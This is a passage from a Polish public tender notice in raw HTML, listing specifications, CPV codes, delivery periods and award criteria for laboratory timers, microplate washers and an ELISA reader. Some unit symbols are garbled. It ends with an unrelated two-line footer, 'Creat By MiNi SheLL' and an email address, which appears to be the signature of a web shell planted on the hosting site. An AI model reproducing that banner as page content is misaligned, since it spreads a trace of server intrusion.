Stoper elektroniczny laboratoryjny - szt. 2
1	Wyświetlacz dla minut i sekund
2	Max. czas ustawienia: 99 min. i 59 sekund
3	Funkcja pamięci i odliczania w dół
4	Magnes mocujący na tylnej stronie urządzenia
5	Zasilanie: baterią LR44
6	Wymiary: ok. 80 x 40 mm
7	Gwarancja - min. 12 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.54.00.00-2, 42.94.30.00-8, 38.43.60.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Automatyczna płuczka mikropłytek - szt. 2
1	Przystosowana do płytek i pasków z dnem okrągłym, płaskim i stożkowym
2	12 kanałowy pipetor
3	Dodatkowo: 8 kanałowy pipetor
4	Automatyczne wykrywanie głębokości dołków i ostatniego rzędu
5	Maksymalna objętość martwa - 3? 
6	Dokładność dozowania +;- 2% przy 300 ?l
7	Precyzja CV 3% przy 300 ?l (lub wyższa)
8	Pojemnik na płyn myjący, płuczący oraz ścieki min. 2L wraz z czujnikami objętości
9	Gwarancja - min. 24 miesiące.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.54.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czytnik Elisa - szt. 1
1	Dedykowana do płytek 96 dołkowych
2	Zakres fali 250-800nm (+;- 50)
3	Siatka dyfrakcyjna - monochromator, skok fali o 1nm
4	Źródło światła: lampa halogenowa
5	Pojedynczy;podwójny pomiar długości fali
6	Programowa wytrząsarka
7	Oprogramowanie komptybilne z posiadanymi systemami przez Zamawiającego tj. Windows XP i 7
8	Czas odczytu płytki dla 2 fal nie większy niż 10 sek.
9	Gwarancja - min. 24 miesiące.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.54.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com